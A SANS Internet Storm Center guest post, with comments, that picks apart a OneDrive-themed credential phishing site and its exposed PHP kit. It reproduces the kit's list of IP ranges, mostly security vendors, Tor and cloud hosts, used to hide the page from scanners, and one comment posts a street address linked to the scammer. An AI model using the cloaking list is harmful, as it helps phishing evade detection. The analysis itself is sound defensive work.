Threat Level: green Handler on Duty: Guy Bruneau

SANS ISC: Identifying a phisher - SANS Internet Storm Center SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Identifying a phisher

[This is a guest post submitted by Nick (Dominic) Koeder aka Fancy]

I’m working as an IT security expert for a mid-sized company in Germany so it is rather common that employees consult me to check some phishy emails they receive. I rarely write blog posts anymore, but this was so funny and enjoyable that I’d like to share my experience.

Recently I was asked to check an email with the following content:

Ah. A word document in OneDrive. Nothing really phishy here. So I started my VM and checked the embedded link

Which leads us to this page:


Looks legit, at least it is very well made. Let’s press the Gmail button:

The page doesn’t look phishy at all, but what has Onedrive to do with the domain in the phishing link (blackened to protect the innocent)? Totally nothing. Well. That is suspicious!

Let’s have a look around, first with the good old directory indexing.

And look what I have found:

Wow, a nice zip file. Let’s download it and check it out. You will not believe, it contains all the nice phishing source code (php) used on this website.

Here’s an excerpt :

And of course, we can find the scammer’s email address:

What a fail!

The following information will be emailed to our scammer:

The most important information is Account Details (username and password). Nice.

Looking up scammer’s email address on google reveals:

Now we even have a name and a phone number.

Of course the name and phone number may be fake, but anyway, big big fail!

The email address is an old one. It is even in this list from 2012:

https://meg-golpistasvirtuais.blogspot.com/2012/04/update-emails-adresses-scammers-dia.html

Let’s check further. It looks like he filters the IP addresses of the visitors of the phishing page:

Accepted visitors:

Therefore he uses a blacklist to deny visitors from certain IP addresses:

The IP ranges of following companies/areas are blacklisted – for obvious reasons:

# NETCRAFT IP RANGES
# KASPERSKY IP RANGES
# OPENDNS IP RANGES
# INTERNET SYSTEMS CONSORTIUM IP RANGES ( PHISHTANK )
# BITDEFENDER IP RANGES
# SURFRIGHT IP RANGES
# FORTINET TECHNOLOGIES IP RANGES
# GOOGLE APPS IP RANGES
# TOR SERVERS IP RANGES
# AMAZON IP RANGES
# OVH IP RANGES
# RACKSPACE IP RANGES
# JAPAN NETWORK INFORMATION CENTER IP RANGES
# HOSTING SOLUTIONS UKRAINE IP RANGES
# NEW DREAM NETWORK IP RANGES
# RCS & RDS RESIDENTIAL IP RANGES
# TORNET IP RANGES
# ROMTELECOM IP RANGES
# NETPILOT ( CLEAN-MX.DE ) IP RANGES
# DATAPIPE IP RANGES
# PEER 1 NETWORK IP RANGES
# ANEXIA IP RANGES
# LEXSI IP RANGES
# FASTWEB ITALY IP RANGES
# GOOGLE CHROME IP RANGES
# ADNET TELECOM IP RANGES
# MCAFEE IP RANGES
# HOSTWAY ROMANIA IP RANGES
# NOISEBRIDGE IP RANGES
# QUBE MANAGED SERVICES IP RANGES
# FORMLESS NETWORKING IP RANGES
# CHAOS COMPUTER CLUB IP RANGES
# MICROSOFT SINGAPORE IP RANGES
# ALIENVAULT IP RANGES
# AVIRA IP RANGES
# COMODO GROUP IP RANGES
# AVG TECHNOLOGIES IP RANGES
# ESET IP RANGES
# DOCTOR WEB IP RANGES
# PANDA SECURITY IP RANGES
# SYMANTEC IP RANGES
# INETU INC IP RANGES
# ABOVENET COMM. IP RANGES
# LEVEL 3 COMM. IP RANGES
# INTERNAP IP RANGES
# INTERNET IDENTITY IP RANGES
# RELIANCE INFOCOM INDIA IP RANGES
# MICROSOFT IP RANGES
# G-DATA SOFTWARE IP RANGES
# SOPHOS IP RANGES
# DATATRAN SYSTEMS IP RANGES
# NETSUMO IP RANGES
# THE NEW YORK INTERNET COMPANY IP RANGES
# TECHCREA SOLUTIONS IP RANGES
# SOLUTIONPRO INC. IP RANGES
# MOSCOW LOCAL TELEPHONE NETWORK IP RANGES
# MAXIS BROADBAND MALAYSIA IP RANGES
# 2COM CO IP RANGES
# POWERTECH INFO SYSTEMS IP RANGES
# LINODE IP RANGES
# ARUBA S.P.A. IP RANGES
# MASSACHUSETTS INSTITUTE OF TECHNOLOGY IP RANGES
# INTEGRA TELECOM IP RANGES
# ZWIEBELFREUNDE ( TOR EXIT NODES ) IP RANGES
# AT&T IP RANGES
# MALCOVERY SECURITY IP RANGES
# TIME WARNER CABLE IP RANGES
# OPAL TELECOM DSL IP RANGES
# BEZEQINT BROADBAND IP RANGES
# UNSPAM TECHNOLOGIES IP RANGES
# HURRICANE ELECTRIC IP RANGES
# TELUS COMMUNICATIONS IP RANGES
# NEOSTRADA ADSL IP RANGES
# MAROCTELECOM IP RANGES
# HOSTDIME IP RANGES
# HETZNER ONLINE IP RANGES
# MICHEAL MCDONOUGH IP RANGES
# JIFFYBOX SERVERS IP RANGES
# THEPLANET.COM IP RANGES
# EDION CORP. IP RANGES
# FHCDMA WIRELESS NETWORK IP RANGES
# ONEANDONE INTERNET IP RANGES
# RACKSPACE CLOUD SERVERS IP RANGES
# ADRIAN HALMAGYI IP RANGES
# CORBINA TELECOM IP RANGES
# PSINET INC. IP RANGES
# RUTGERS UNIVERSITY IP RANGES
# EBAY INC. IP RANGES
# UROSPACE IP RANGES
# ADATPARK IP RANGES
# VIAWEST IP RANGES
# TOR EXIT NODES IP RANGES
# SOPRADO GMBH IP RANGES
# RELIABLE WEB SERVICES IP RANGES
# SWISS PRIVACY FOUNDATION IP RANGES
# UBIQUITY SERVER IP RANGES
# SECURE DRAGON IP RANGES
# INTERGENIA IP RANGES
# A1COLO IP RANGES
# BT UK IP RANGES
# CHINANET IP RANGES
# KEYWEB IP RANGES
# FDCSERVERS IP RANGES
# LEASEWEB GERMANY IP RANGES
# EUSERV.DE IP RANGES
# A10 ROW IP RANGES
# MICROSOFT IP RANGES
# WEHOSTWEBSITES.COM
# ANTISPAM EUROPE
# YAHOO
# MOSCOW COLOCATION
# HOSTMASTER LIBERTY GLOBAL
# GOOGLE CLOUD
# OPERA
# INDIAN ISP ( MICROSOFT/GOOGLE-RELATED )
# GODADDY
# CORPORATION SERVICES WORLDWIDE
# NETVISION
# GOOGLE CLOUD
# TRUSTWAVE HOLDINGS
# WEBSENSE-NET2
# ---------- FROM HERE BELLOW CUSTOM IPS ----------
# http://iptool.xyz/
# https://myip.ms/
# Internap Network Services Corporation
# DomainSONOCrawler
# VERISIGN
# Trend Micro Incorporated Japan
# TI RUSSIA
# Domaintools, LLC
# Ovh Hosting, Inc - CANADA
# Latisys - Denver, LLC
# RACKSPACE : PART 2
# The Calyx Institute
# Datasource Ag : Switzerland
# Net By Net Holding Llc : RUSSIA (too many to list)
# Global Frag Networks
# United Networks of Ukraine, Ltd
# Prescient Software, Inc
# Fireeye, Inc
# Boston University
# Carnegie Mellon University
# Codero
# Abovenet Communications, Inc
# Golden Lines : Israel
# China Internet Network Information Center
# Handy Networks, LLC
# Bezeq International : Israel : IMPORTANT_MULTIPLE_VISITS
# Fieldtech Inc
# Ovh Sas : France
# Ovh Sas - Germany
# Energy Group Networks Llc
# Amazon.com, Inc - IMPORTANT_MULTIPLE_VISITS
# Powertech Information Systems As : Norway
# Netvision Ltd : Israel
# Rcs & Rds S.a - Romania
# Ovh Sas - Lithuania
# Ficolo Cust. 1158 - Finland
# Zhejiang Taobao Network Co. Ltd
# SOLAR-VPS
# Chinanet Jiangsu Province Network
# YBV : China
# Microsoft Corporation
# Aliyun Computing Co. Ltd : CHINA
# Versaweb, LLC : USA
# Fop Tokarchuk Oleksandr Stepanovich : UKRAINE
# Chinanet Fujian Province Network
# Bluehost Inc : USA
# National Cable Networks : RUSSIA
# Hostgator.com Llc : USA
# Green House Data, Inc : USA
# Hetzner Online Ag : GERMANY

And all this because the scammer forgot to remove the zip file. Lol.

You see, scammers are humans too and make mistakes.

Nota bene: the owner of the hacked website/domain has been informed.

Defending Web Applications Security Essentials - Secure DevOps Summit & Training 2018

Johannes

3372 Posts
ISC Handler
Superb!

Nice wee breakdown of how a phisher works. We block loads here but there are always some that get through and customers that click on the link.

thanks for it. Very informative.
Douglas

1 Posts
Looks like Picture10nickfancy.png might need a bit more redacting.
GAQQ

1 Posts
19125 Summit Ridge Dr, Walnut, CA 91789

https://www.youtube.com/watch?v=NIT1nUXgReA

Looks nice, if you like LA.

Maybe it's an elaborate scheme from a tech-savvy realtor to generate interest in the property; or a red herring.
Kilroy

4 Posts
Very nice. Great write up!
KPryor

9 Posts

Sign Up for Free or Log In to start participating in the conversation!